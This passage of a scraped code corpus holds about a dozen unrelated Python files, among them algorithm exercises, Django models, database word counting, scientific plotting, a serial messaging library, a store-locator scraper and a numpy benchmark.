increasing, otherwise decreasing\n # e.g. for nums = [3, 1, 4, 2]: scanning from the right pushes 2, then 4 pops it\n # (tmp_num = 2) and left_min_list[2] == 1 < 2, so a 132 pattern exists\n\n while stack and stack[-1] < nums[index]:\n tmp_num = stack.pop()\n\n if left_min_list[index] < tmp_num:\n return True\n stack.append(nums[index])\n\n return False\n\n\nif __name__ == \"__main__\":\n print(Solution.direct_hand([-1, 3, 2, 0]))\n print(Solution.monotonic_stack_hand([3, 4, 2, 6, 4, 5, 2, 3]))\n","sub_path":"algorithm/LeetCode_456_132 模式.py","file_name":"LeetCode_456_132 模式.py","file_ext":"py","file_size_in_byte":2596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
+{"seq_id":"459324229","text":"from django.db import models\nfrom django.contrib.auth.models import User\nimport datetime as dt\nfrom django.db.models.signals import post_save\nfrom django.dispatch import receiver\nfrom tinymce.models import HTMLField\n
from url_or_relative_url_field.fields import URLOrRelativeURLField\nfrom django.core.validators import MaxValueValidator\n\n\nclass Profile(models.Model):\n profile_photo=models.ImageField(upload_to='profiles/',default='nyungu.png')\n bio=models.TextField(max_length=500) \n profile_name=models.CharField(max_length =30,blank=True)\n user=models.OneToOneField(User,on_delete=models.CASCADE)\n \n @receiver(post_save, sender=User)\n def create_profile(sender, instance, created, **kwargs):\n if created:\n Profile.objects.create(user=instance)\n\n @receiver(post_save, sender=User)\n def save_profile(sender,instance,**kwargs):\n instance.profile.save()\n\n @classmethod\n def filter_by_id(cls,id):\n profile = Profile.objects.filter(user=id).first()\n return profile\n\n @classmethod\n def get_by_id(cls,id):\n profile = Profile.objects.get(user=id)\n return profile\n\n\nclass Category(models.Model):\n category =models.CharField(max_length =30)\n\n def save_category(self):\n self.save()\n\n def __str__(self):\n return self.category\n\n\n\nclass Recipe(models.Model):\n profile = models.ForeignKey(User,null=True,on_delete=models.CASCADE)\n title = models.CharField(max_length=20,blank=True)\n food_image = models.ImageField(upload_to='landing/')\n description = HTMLField(max_length=6000,blank=True)\n link = URLOrRelativeURLField(max_length=200)\n pub_date = models.DateTimeField(auto_now_add=True)\n simplicity = models.IntegerField(default=0)\n serves = models.IntegerField(default=0)\n prep_time = models.IntegerField(default=0)\n category=models.ForeignKey(Category,on_delete=models.CASCADE)\n\n\n\n @classmethod\n def get_profile_recipes(cls,profile):\n recipes = Recipe.objects.filter(profile__pk=profile)\n print(recipes)\n return recipes\n\n @classmethod\n def search_by_recipes(cls,search_term):\n recipes = cls.objects.filter(title__icontains=search_term)\n return recipes\n\n\n def __str__(self):\n return self.title\n\nclass Comments(models.Model):\n comm = models.CharField(max_length = 100, blank = True)\n Recipe = models.ForeignKey(Recipe, related_name = \"comments\", on_delete = models.CASCADE)\n\n\n def save_comment(self):\n self.save()\n\n def delete_comment(self):\n Comments.objects.get(id = self.id).delete()\n \n def update_comment(self,new_comment):\n comm = Comments.objects.get(id = self.id)\n comm.comm = new_comment\n comm.save()\n\nclass Ratings(models.Model):\n creativity = models.PositiveIntegerField(default=0,validators=[MaxValueValidator(10)])\n simplicity= models.PositiveIntegerField(default=0,validators=[MaxValueValidator(10)])\n content = models.PositiveIntegerField(default=0,validators=[MaxValueValidator(10)])\n user = models.ForeignKey(User,on_delete=models.CASCADE)\n recipe = models.IntegerField(default=0)\n\n\n","sub_path":"recipe/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3102,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
+{"seq_id":"592964683","text":"from __future__ import absolute_import, print_function, unicode_literals\nfrom collections import Counter\nfrom streamparse.bolt import Bolt\nimport psycopg2\n\n\nclass WordCounter(Bolt):\n\n def initialize(self, conf, ctx):\n self.counts = Counter()\n\n def process(self, tup):\n word = tup.values[0]\n w = None\n\n self.counts[word] += 1\n self.emit([word, self.counts[word]])\n\n # try to connect to database.\n try:\n conn = psycopg2.connect(database=\"tcount\", user=\"postgres\", password=\"pass\", host=\"localhost\", port=\"5432\")\n cur = conn.cursor()\n except:\n self.log('Cannot connect 
to database')\n exit()\n\n # if there's a word to process, try to find in database.\n cur.execute(\"SELECT word FROM tweetwordcount WHERE word = %s\", [word])\n result = cur.fetchone()\n if result is not None:\n w = result[0]\n conn.commit()\n\n # if the word does not exist in the database, insert it with initial count\n if w != word:\n cur.execute(\"INSERT INTO tweetwordcount (word, count) VALUES (%s, %s)\", (word, self.counts[word]))\n conn.commit()\n else: # otherwise update the word count in the database\n cur.execute(\"UPDATE tweetwordcount SET count = %s WHERE word = %s\",(self.counts[word], word))\n conn.commit()\n\n conn.close()\n\n # Log the count - just to see the topology running\n self.log('%s: %d' % (word, self.counts[word]))\n","sub_path":"exercise_2/tweetwordcount/src/bolts/wordcount.py","file_name":"wordcount.py","file_ext":"py","file_size_in_byte":1530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
+{"seq_id":"105765978","text":"from todo_app.view_model import ViewModel\nfrom todo_app.todo_item import TodoItem\n\ndef test_view_model_todo_items():\n items = [\n TodoItem(1, \"To Do\", \"This is To Do Item\"),\n TodoItem(2, \"Doing\", \"This is Doing Item\"),\n TodoItem(3, \"Done\", \"This is Done\")\n ]\n viewmodel = ViewModel(items)\n todoitems = viewmodel.todo_items\n\n assert len(todoitems) == 1 \n item = todoitems[0]\n assert item.status == 'To Do'\n\ndef test_view_model_doing_items():\n items = [\n TodoItem(1, \"Doing\", \"This is Doing Item\"),\n TodoItem(2, \"To Do\", \"This is Doing Item\"),\n TodoItem(3, \"Done\", \"This is Done\")\n ]\n viewmodel = ViewModel(items)\n doingitems = viewmodel.doing_items\n\n assert len(doingitems) == 1\n item = doingitems[0]\n assert item.status == 'Doing'\n\n\ndef test_view_model_done_items():\n items = [\n TodoItem(1, \"Done\", \"This is Done Item\"),\n TodoItem(2, \"To Do\", \"This is Doing Item\"),\n TodoItem(3, \"Doing\", \"This is Doing\")\n ]\n viewmodel = ViewModel(items)\n doneitems = viewmodel.done_items\n\n assert len(doneitems) == 1\n item = doneitems[0]\n assert item.status == 'Done'\n\n\n\n","sub_path":"tests/test_view_model.py","file_name":"test_view_model.py","file_ext":"py","file_size_in_byte":1191,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
+{"seq_id":"55151077","text":"import turtle\n\nturtle.speed(0)\n\ndef coolshapes(color, fillin, distance, angle, locationx, locationy, loops):\n turtle.penup()\n turtle.setx(locationx)\n turtle.sety(locationy)\n turtle.pencolor(color)\n \n turtle.pendown()\n turtle.fillcolor(fillin)\n turtle.begin_fill()\n\n for i in range(loops):\n\n turtle.forward(distance)\n turtle.right(angle)\n \n turtle.end_fill()\n \n\ncoolshapes(\"red\", \"red\", 50, 45, 100, 100, 8)\n\ncoolshapes(\"blue\", \"yellow\", 100, 144, -100, -100, 5)\n\ndef coolspiral(color, distance, angle, locationx, locationy, loops):\n turtle.penup()\n turtle.setx(locationx)\n turtle.sety(locationy)\n turtle.pencolor(color)\n\n turtle.pendown()\n\n for i in range(loops):\n\n turtle.forward(distance)\n turtle.left(angle)\n angle += 1\n\ncoolspiral(\"purple\", 7, 1, -100, 100, 40)\n\ncoolshapes(\"teal\", \"white\", 50, 277, 100, -100, 13)\n","sub_path":"Programs/1400_OOP1/Turtle.py","file_name":"Turtle.py","file_ext":"py","file_size_in_byte":996,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
+{"seq_id":"299606640","text":"# Copyright 2020 Google LLC\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n\ndef make_parent(parent: str) -> str:\n parent = parent\n\n return parent\n\ndef make_batch_prediction_job(\n display_name: str,\n model_name: str,\n gcs_source_uri: str,\n gcs_destination_output_uri_prefix: str,\n) -> google.cloud.aiplatform_v1beta1.types.batch_prediction_job.BatchPredictionJob:\n model_parameters_dict = {}\n model_parameters = to_protobuf_value(model_parameters_dict)\n\n batch_prediction_job = {\n \"display_name\": display_name,\n # Format: 'projects/{project}/locations/{location}/models/{model_id}'\n \"model\": model_name,\n \"model_parameters\": model_parameters,\n \"input_config\": {\n \"instances_format\": \"jsonl\",\n \"gcs_source\": {\"uris\": [gcs_source_uri]},\n },\n \"output_config\": {\n \"predictions_format\": \"jsonl\",\n \"gcs_destination\": {\"output_uri_prefix\": gcs_destination_output_uri_prefix},\n },\n }\n\n return batch_prediction_job\n\n","sub_path":".sample_configs/param_handlers/create_batch_prediction_job_text_classification_sample.py","file_name":"create_batch_prediction_job_text_classification_sample.py","file_ext":"py","file_size_in_byte":1540,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"436657987","text":"# Definition for an interval.\n# class Interval(object):\n# def __init__(self, s=0, e=0):\n# self.start = s\n# self.end = e\n\n\nclass Solution(object):\n\n def mergeSort(self, l):\n if len(l) <= 1:\n return l\n mid = len(l) // 2\n left = self.mergeSort(l[:mid])\n right = self.mergeSort(l[mid:])\n return self.merge(left, right)\n\n def merge(self, left, right):\n if not left:\n return right\n if not right:\n return left\n\n result = [0] * (len(left) + len(right))\n\n p1 = p2 = 0\n\n while p1 < len(left) and p2 < len(right):\n if left[p1].start < right[p2].start:\n result[p1 + p2] = left[p1]\n p1 += 1\n else:\n result[p1 + p2] = right[p2]\n p2 += 1\n\n while p1 < len(left):\n result[p1 + p2] = left[p1]\n p1 += 1\n\n while p2 < len(right):\n result[p1 + p2] = right[p2]\n p2 += 1\n return result\n\n def canAttendMeetings(self, intervals):\n l = self.mergeSort(intervals)\n for i in range(1, len(l)):\n if l[i].start < l[i - 1].end:\n return False\n return True\n","sub_path":"252-meeting-rooms/mergesort.py","file_name":"mergesort.py","file_ext":"py","file_size_in_byte":1247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"196585262","text":"a=[\"venky\",'venkat',\"venkayyy\"]\nprint(\"%s %s\"%(a[0],a[-1]))\n\ndate=(11,12,2018)\nprint(\"the exam date is :%i /%i /%i\"%date)\n\n\nn=int(input(\"enter a number: \"))\nn1=int(\"%s\"%n)\nn2=int(\"%s%s\"%(n,n))\nn3=int(\"%s%s%s\"%(n,n,n))\nprint(n1+n2+n3)\n\n","sub_path":"requirements/venky_task/prct/colors list.py","file_name":"colors list.py","file_ext":"py","file_size_in_byte":235,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} 
+{"seq_id":"419843199","text":"import tornado.gen\nimport tornado_mysql\nimport logging\nimport uuid\n\nfrom mickey.mysqlcon import get_mysqlcon\nfrom bsslibs.commonutil import MICKEY_ORDER_STAGE_FINAL, MICKEY_DISPATCH_STAGE_FINAL\n\nfrom bsslibs.mickey_operate import Mickey_Operate\n\n_sqlquery = \"\"\"\n UPDATE order_bills a, dispatch_bills b SET a.stage = %s, b.stage = %s WHERE a.sid = b.order_id AND a.sid = %s;\n\"\"\"\n\nclass Mickey_Operate_FinishOrder(Mickey_Operate):\n @tornado.gen.coroutine\n def do(self, userid, data):\n if not data:\n return (403, None)\n\n sid = data.get(\"id\", \"\")\n if not sid:\n logging.error(\"invalid parameter no id\")\n return (403, None)\n\n conn = yield get_mysqlcon()\n if not conn:\n logging.error(\"connect to mysql failed\")\n return (500, None)\n\n rst_code = 200\n\n try:\n cur = conn.cursor()\n yield cur.connection.autocommit(True)\n yield cur.execute(_sqlquery, (MICKEY_ORDER_STAGE_FINAL, MICKEY_DISPATCH_STAGE_FINAL, sid))\n print(_sqlquery % (MICKEY_ORDER_STAGE_FINAL, MICKEY_DISPATCH_STAGE_FINAL, sid))\n cur.close()\n\n except Exception as e:\n logging.error(\"db oper failed {0}\".format(e))\n rst_code = 500\n finally:\n conn.close()\n\n return (rst_code, None)\n \n","sub_path":"bsslibs/mickey_operate_finishorder.py","file_name":"mickey_operate_finishorder.py","file_ext":"py","file_size_in_byte":1366,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"333518054","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport sys\nsys.path.append(\"/home/lancy/caffe/python\")\nfrom PIL import Image\nimport caffe\nfrom copy import deepcopy\n\n\ndef gen_net(num):\n caffe.set_device(0)\n caffe.set_mode_gpu()\n\n filename = '2007_000032.jpg'\n im = Image.open(filename)\n m = np.asarray(im, dtype=np.float32)\n m = m[:,:,::-1]\n m -= np.array((104.00698793,116.66876762,122.67891434))\n m = m.transpose((2, 0, 1))\n\n net = caffe.Net(\n \"train_val.prototxt\",\n \"train_iter_\" + str(num) + \".caffemodel\",\n # \"/data/VGG16/caffemodel\",\n # \"../fcn-32s/good.caffemodel\",\n caffe.TRAIN)\n\n net.blobs[\"data\"].reshape(1, *m.shape)\n net.blobs[\"data\"].data[...] 
= m\n net.forward()\n return net\n\n","sub_path":"fcn-8s/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":765,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"521928762","text":"#!/usr/bin/env python\n#\n# Create \"state profiles\" of all protocols.\n#\n#\n#\nimport os\nimport myokit\nimport numpy as np\nimport matplotlib\nimport matplotlib.pyplot as plt\n\nimport sys\nsys.path.append(os.path.abspath('..'))\nfrom state_profile import *\n\n# Load HH model\nm = myokit.load_model(\n os.path.join('..', '..', 'models', 'beattie-2017-ikr-hh.mmt'))\n\n# Set Kylie's sine wave parameters\nm.get('ikr.p1').set_rhs(2.26026076650526e-004)\nm.get('ikr.p2').set_rhs(6.99168845608636e-002)\nm.get('ikr.p3').set_rhs(3.44809941106440e-005)\nm.get('ikr.p4').set_rhs(5.46144197845311e-002)\nm.get('ikr.p5').set_rhs(8.73240559379590e-002)\nm.get('ikr.p6').set_rhs(8.91302005497140e-003)\nm.get('ikr.p7').set_rhs(5.15112582976275e-003)\nm.get('ikr.p8').set_rhs(3.15833911359110e-002)\nm.get('ikr.p9').set_rhs(1.52395993652348e-001)\n\n# Move to stable state at -80mV\nm.get('ikr.act').set_state_value(m.get('ikr.act.inf').pyfunc()(-80))\nm.get('ikr.rec').set_state_value(m.get('ikr.rec.inf').pyfunc()(-80))\n\nif True:\n # Pr 1\n p = myokit.load_protocol(\n os.path.join('..', '7-stat-simulations', 'pr1-modified.mmt'))\n s = myokit.Simulation(m, p)\n d = s.run(p.characteristic_time())\n #plot_profile(\n # 'pr1-state-profile.png', d, 'Pr1 (Activation rate 0mV)', 5000, model=m)\n plot_profile_3d(\n 'pr1-state-profile-3d.png', d, 'Pr1 (Activation rate 0mV)', 5000,\n model=m)\n\n # Pr 2\n p = myokit.load_protocol(\n os.path.join('..', '7-stat-simulations', 'pr2-modified.mmt'))\n s = myokit.Simulation(m, p)\n d = s.run(p.characteristic_time())\n plot_profile(\n 'pr2-state-profile.png', d, 'Pr2 (Activation rate 40mV)', 5000,\n model=m)\n plot_profile_3d(\n 'pr2-state-profile-3d.png', d, 'Pr2 (Activation rate 40mV)', 5000,\n model=m)\n\n # Pr 3\n p = myokit.load_protocol(\n os.path.join('..', '7-stat-simulations', 'pr3-modified.mmt'))\n s = myokit.Simulation(m, p)\n d = s.run(p.characteristic_time())\n plot_profile(\n 'pr3-state-profile.png', d, 'Pr3 (Steady-state activation)', 8000,\n model=m)\n plot_profile_3d(\n 'pr3-state-profile-3d.png', d, 'Pr3 (Steady-state activation)', 8000,\n model=m)\n\n # Pr 4\n p = myokit.load_protocol(\n os.path.join('..', '7-stat-simulations', 'pr4-modified.mmt'))\n s = myokit.Simulation(m, p)\n d = s.run(p.characteristic_time())\n plot_profile(\n 'pr4-state-profile.png', d, 'Pr4 (Inactivation rate)', 3000, model=m)\n plot_profile_3d(\n 'pr4-state-profile-3d.png', d, 'Pr4 (Inactivation rate)', 3000,\n model=m)\n\n # Pr 5\n p = myokit.load_protocol(\n os.path.join('..', '7-stat-simulations', 'pr5-modified.mmt'))\n s = myokit.Simulation(m, p)\n d = s.run(p.characteristic_time())\n plot_profile(\n 'pr5-state-profile.png', d, 'Pr5 (Recovery rate)', 10500, model=m)\n plot_profile_3d(\n 'pr5-state-profile-3d.png', d, 'Pr5 (Recovery rate)', 10500, model=m)\n\nif True:\n # Pr 6 : APs, load protocol as waveform\n p = myokit.DataLog.load(os.path.join('..', '..', 'validation-data', 'ap.zip'))\n s = myokit.Simulation(m)\n s.set_fixed_form_protocol(p.time(), p['voltage'])\n s.set_max_step_size(0.1)\n d = s.run(8824)\n\n steps = [\n 0,\n 570,\n 1760,\n 5600,\n 7320,\n 8824,\n ]\n colors = [\n 'tab:blue', # Leak\n 'tab:orange', # Three waveforms\n 'tab:green', # Many APs\n 'tab:red', # EADs\n 'tab:blue', # Leak\n ]\n labels = [\n 'Leak',\n 
'SAN/Vent/Atrial',\n 'Model APs',\n 'EAD APs',\n None,\n ]\n\n # Create legend of colours\n steps = list(zip(steps[:-1], steps[1:])) # materialise: reused below after the loop consumes it\n plt.figure(figsize=(12, 5))\n plt.xlabel('Time (ms)')\n plt.ylabel('Command potential (mV)')\n for k, step in enumerate(steps):\n lo = d.find(step[0])\n hi = d.find(step[1])\n plt.plot(\n d.time()[lo:hi], d['membrane.V'][lo:hi],\n color=colors[k], label=labels[k])\n plt.grid(True)\n plt.legend(loc='lower center', ncol=2)\n plt.savefig('pr6-colours.png')\n\n plot_profile(\n 'pr6-state-profile.png', d, 'AP waveforms',\n steps_and_colors=(steps, colors), model=m)\n\n plot_profile_3d(\n 'pr6-state-profile-3d.png', d, 'AP waveforms',\n steps_and_colors=(steps, colors), model=m)\n\n\n# Pr 7 : Sine waves, load protocol as waveform\nif True:\n p = myokit.DataLog.load_csv(\n os.path.join('..', '..', 'sine-wave-data', 'sine-wave.csv'))\n s = myokit.Simulation(m)\n s.set_fixed_form_protocol(p.time(), p['voltage'])\n s.set_max_step_size(0.1)\n d = s.run(p.time()[-1])\n\n steps = [\n 0,\n 3000,\n 6500,\n 8000,\n ]\n colors = [\n 'tab:blue',\n 'tab:orange',\n 'tab:blue',\n ]\n labels = [\n 'Leak',\n 'Sine',\n None,\n ]\n\n # Create legend of colours\n steps = list(zip(steps[:-1], steps[1:])) # materialise: reused below after the loop consumes it\n plt.figure(figsize=(12, 5))\n plt.xlabel('Time (ms)')\n plt.ylabel('Command potential (mV)')\n for k, step in enumerate(steps):\n lo = d.find(step[0])\n hi = d.find(step[1])\n plt.plot(\n d.time()[lo:hi], d['membrane.V'][lo:hi],\n color=colors[k], label=labels[k])\n plt.grid(True)\n plt.legend(loc='lower center', ncol=2)\n plt.savefig('pr7-colours.png')\n\n plot_profile(\n 'pr7-state-profile.png', d, 'Sine wave',\n steps_and_colors=(steps, colors), model=m)\n\n plot_profile_3d(\n 'pr7-state-profile-3d.png', d, 'Sine wave',\n steps_and_colors=(steps, colors), model=m)\n\nplt.show()\n","sub_path":"beattie-2017/phase-plane/profiles.py","file_name":"profiles.py","file_ext":"py","file_size_in_byte":5662,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
+{"seq_id":"346130083","text":"import requests\nimport os\nimport json\n\nfolder_path = './kfc/'\n\ndef location():\n post_url = 'http://www.kfc.com.cn/kfccda/ashx/GetStoreList.ashx?op=keyword'\n headers = {\n 'User-Agent': \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36\",\n }\n post_data = {\n 'cname': '',\n 'pid': '',\n 'keyword': '北京',\n 'pageIndex': '1',\n 'pageSize': '1'\n }\n response = requests.post(url=post_url, data=post_data, headers=headers)\n json_obj = response.json() # parse, so the file holds real JSON rather than a quoted string\n file_path = folder_path + 'beijing_location.json'\n with open(file_path, 'w', encoding='utf-8') as fp:\n json.dump(json_obj, fp, ensure_ascii=False)\n print(file_path + ' saved!')\n\n\nif __name__ == '__main__':\n if not os.path.exists(folder_path):\n os.mkdir(folder_path)\n location()\n\n","sub_path":"kfc.py","file_name":"kfc.py","file_ext":"py","file_size_in_byte":867,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
+{"seq_id":"93553080","text":"# -*- coding: utf-8 -*-\n\nfrom django.conf.urls import url\nfrom rest_framework.urlpatterns import format_suffix_patterns\n\nfrom formulas.run import FormulaExecuteView\nfrom formulas.views import FormulasListAPI, FormulaFunctionsListAPI, FormulasDetailAPI, FormulasTemplateAPI, \\\n FormulaVarietiesDetailAPI\n\nurlpatterns = [\n url(r'^$', FormulasListAPI.as_view()),\n url(r'^template/$', FormulasTemplateAPI.as_view()),\n url(r'^(?P<pk>[0-9]+)/$', FormulasDetailAPI.as_view()),\n 
url(r'^(?P<pk>[0-9]+)/varieties/(?P<variety_pk>[0-9]+)/$', FormulaVarietiesDetailAPI.as_view()),\n url(r'^functions/', FormulaFunctionsListAPI.as_view()),\n url(r'^execute/', FormulaExecuteView.as_view()),\n]\n\nurlpatterns = format_suffix_patterns(urlpatterns)\n","sub_path":"src/api/formulas/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
+{"seq_id":"577998247","text":"# uncompyle6 version 3.6.7\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.8.2 (tags/v3.8.2:7b3ab59, Feb 25 2020, 23:03:10) [MSC v.1916 64 bit (AMD64)]\n# Embedded file name: /usr/local/lib/python2.7/dist-packages/cmdmessenger/messenger.py\n# Compiled at: 2015-01-27 21:20:28\n__doc__ = '\\nuse stream.inWaiting to check if bytes are available\\n\\n A command is a python -> arduino\\n A callback is arduino -> python\\n\\n Commands are defined by dictionaries with:\\n name: [string] namespace name, only used for commands\\n id: [int] message id, only used for commands\\n params: [list of types, see params.py] if not present, no params\\n function: [callable] only used for callbacks\\n\\n'\nfrom . import params\n\nclass InvalidCommand(Exception):\n pass\n\n\ndef validate_command(cmd):\n if isinstance(cmd, (list, tuple)):\n return [ validate_command(c) for c in cmd ]\n if 'params' in cmd:\n for p in cmd['params']:\n if p not in params.types:\n raise InvalidCommand('Command %s unknown param %s' % (cmd, p))\n\n return True\n\n\ndef split_line(l, fs=',', ls=';', esc='\\\\'):\n sline = l.strip()\n start = 0\n if sline[(-1)] == ls:\n end = len(l) - 1\n else:\n end = len(l)\n if end <= start:\n raise Exception('Invalid line %s' % l)\n tokens = []\n while start < end:\n sub_line = sline[start:end]\n if fs not in sub_line:\n tokens.append(sub_line)\n break\n i = sub_line.index(fs)\n if i == 0:\n raise Exception('Invalid line %s' % l)\n while sub_line[(i - 1)] == esc:\n if len(sub_line) > 1 and sub_line[(i - 2)] == esc:\n break\n sub_sub_line = sub_line[i + 1:end]\n if fs not in sub_sub_line:\n i = end\n break\n i += sub_sub_line.index(fs) + 1\n\n tokens.append(sub_line[:i])\n start += i + 1\n if len(tokens) > 5:\n raise Exception\n\n return tokens\n\n\ndef escape(s, fs=',', ls=';', esc='\\\\'):\n if isinstance(s, (tuple, list)):\n return [ escape(i, esc) for i in s ]\n s = s.replace(esc, esc + esc)\n s = s.replace(fs, esc + fs)\n s = s.replace(ls, esc + ls)\n return s\n\n\ndef unescape(s, esc='\\\\'):\n if isinstance(s, (tuple, list)):\n return [ unescape(i, esc) for i in s ]\n return s.replace(esc, '')\n\n\nclass Messenger(object):\n\n def __init__(self, stream, cmds, fs=',', ls=';', esc='\\\\'):\n \"\"\"cmds should be a list\"\"\"\n self.stream = stream\n self.fs = fs\n self.ls = ls\n self.esc = esc\n validate_command(cmds)\n self.cmds = {}\n for i, c in enumerate(cmds):\n if not isinstance(c, dict):\n c = {'name': c}\n c['id'] = i\n self.cmds[i] = c\n if 'name' in c:\n self.cmds[c['name']] = c\n\n self.callbacks = {}\n\n def process_line(self, l):\n tokens = unescape(split_line(l, self.fs, self.ls, self.esc), self.esc)\n cmd_id = int(tokens[0])\n types = self.cmds[cmd_id].get('params', [])\n args = [ t['from'](a) for t, a in zip(types, unescape(tokens[1:])) ]\n if cmd_id not in self.callbacks:\n self.unknown(*args)\n else:\n self.callbacks[cmd_id](*args)\n\n def read_line(self):\n l = self.stream.read(1)\n esc = l[(-1)] == self.esc\n while l[(-1)] != self.ls or esc:\n l += self.stream.read(1)\n if esc:\n esc = False\n 
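# the byte just read was escaped by the previous one, so it can never\n # terminate the line; clear the flag and keep reading\n 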
else:\n esc = l[(-1)] == self.esc\n\n return l\n\n def send(self, cmd_id, *args):\n msg = self.fs.join((str(cmd_id),) + tuple(escape(args))) + self.ls\n self.stream.write(msg)\n\n def attach(self, func, index):\n self.callbacks[index] = func\n\n def unknown(self, *args):\n pass\n\n def call(self, index, *args):\n cmd = self.cmds[index]\n types = cmd.get('params', [])\n self.send(cmd['id'], *[ t['to'](a) for t, a in zip(types, args) ])","sub_path":"pycfiles/cmdo-App-0.3.tar/messenger.py","file_name":"messenger.py","file_ext":"py","file_size_in_byte":4080,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"493930289","text":"import timeit\nfrom elements.utils import AttrDict, flatten\nimport numpy as np\nimport numba\nimport opt_einsum\nfrom elements.clib import multiple_dot_products\n\n# Test of multiple dot products:\n# An array of matrices (A) times array of matrices (B)\n# C[0] = A[0] * B[0]\n# C[1] = A[1] * B[1]\n# C[2] = A[2] * B[2]\n# ...\n\n\nsize = 4\nn = 10000\n\na = np.random.rand(n, size, size)\na_list = [a[i, :, :] for i in range(n)]\nnum = 10 # size of nested list\na_nested_list = [a_list[i:i + num] for i in range(n)[::10]]\ntester = 0\nb = np.random.rand(size, size)\n\n\nclass Structure:\n pass\n\n\ntwissdata = Structure()\n\ndef GPUimplementationwithopt_einsum():\n pass\n\ndef einsum():\n # BE =opt_einsum.contract('nij,jk->nik', matrix_array, B0, backend='numpy')\n BE = np.einsum('nik,kj->nij', a, b, optimize='optimal')\n # twissdata = AttrDict()\n twissdata.betax = BE[0, 0] # betax\n twissdata.betay = BE[2, 2] # betay\n twissdata.alphax = -BE[0, 1] # alphax\n twissdata.alphay = -BE[2, 3] # alphay\n twissdata.gammax = BE[1, 1] # gammax\n twissdata.gammay = BE[3, 3] # gammay\n return BE\n\n\ndef cCode():\n BE = np.empty((n, size, size))\n multiple_dot_products(a, b, BE)\n twissdata.betax = BE[0, 0] # betax\n twissdata.betay = BE[2, 2] # betay\n twissdata.alphax = -BE[0, 1] # alphax\n twissdata.alphay = -BE[2, 3] # alphay\n twissdata.gammax = BE[1, 1] # gammax\n twissdata.gammay = BE[3, 3] # gammay\n return BE\n\ndef dot_app():\n a.shape = n * size, size\n BE = np.dot(a, b)\n a.shape = n, size, size\n BE.shape = n, size, size\n # print(c.flags)\n twissdata = AttrDict()\n twissdata.betax = BE[0, 0] # betax\n twissdata.betay = BE[2, 2] # betay\n twissdata.alphax = -BE[0, 1] # alphax\n twissdata.alphay = -BE[2, 3] # alphay\n twissdata.gammax = BE[1, 1] # gammax\n twissdata.gammay = BE[3, 3] # gammay\n return BE\n\n\n@numba.jit(nopython=True, parallel=True)\ndef forloop():\n c = np.empty(a.shape)\n for i in numba.prange(a.shape[0]):\n c[i] = np.dot(a[i], b)\n return c\n\n\ndef dot_simple():\n BE = np.dot(a_list, b)\n # twissdata = Structure()\n twissdata.betax = BE[0, 0] # betax\n twissdata.betay = BE[2, 2] # betay\n twissdata.alphax = -BE[0, 1] # alphax\n twissdata.alphay = -BE[2, 3] # alphay\n twissdata.gammax = BE[1, 1] # gammax\n twissdata.gammay = BE[3, 3] # gammay\n return BE\n\n\ndef forloop_list():\n matrix_array = np.empty(a.shape)\n twissdata = AttrDict()\n twissdata.betax = np.empty(len(a_list))\n twissdata.betay = np.empty(len(a_list))\n twissdata.alphax = np.empty(len(a_list))\n twissdata.alphay = np.empty(len(a_list))\n twissdata.gammax = np.empty(len(a_list))\n twissdata.gammay = np.empty(len(a_list))\n for i, x in enumerate(a_list):\n matrix_array[i, :, :] = BE = np.dot(x, b)\n twissdata.betax[i] = BE[0, 0] # betax\n twissdata.betay[i] = BE[2, 2] # betay\n twissdata.alphax[i] = -BE[0, 1] # alphax\n 
twissdata.alphay[i] = -BE[2, 3] # alphay\n twissdata.gammax[i] = BE[1, 1] # gammax\n twissdata.gammay[i] = BE[3, 3] # gammay\n return matrix_array\n\n\ndef forloop_list_nested():\n c = np.empty(a.shape)\n index = 0\n for x in a_nested_list:\n for y in (x):\n c[index, :, :] = np.dot(y, b)\n index += 1\n return c\n\n\ndef einsum_list2array():\n a_array = np.array([y for x in a_nested_list for y in x])\n BE = np.einsum('nij,jk->nik', a_array, b)\n twissdata = AttrDict()\n twissdata.betax = BE[0, 0] # betax\n twissdata.betay = BE[2, 2] # betay\n twissdata.alphax = -BE[0, 1] # alphax\n twissdata.alphay = -BE[2, 3] # alphay\n twissdata.gammax = BE[1, 1] # gammax\n twissdata.gammay = BE[3, 3] # gammay\n return BE\n\n\nprint('\\nCheck numpy allclose:')\nprint('is equal = {}'.format(np.allclose(forloop(), einsum())))\nprint('is equal = {}'.format(np.allclose(dot_simple(), einsum())))\nprint('is equal = {}'.format(np.allclose(dot_app(), einsum())))\nprint('is equal = {}'.format(np.allclose(cCode(), einsum())))\nprint('is equal = {}'.format(np.allclose(forloop_list(), einsum())))\nprint('is equal = 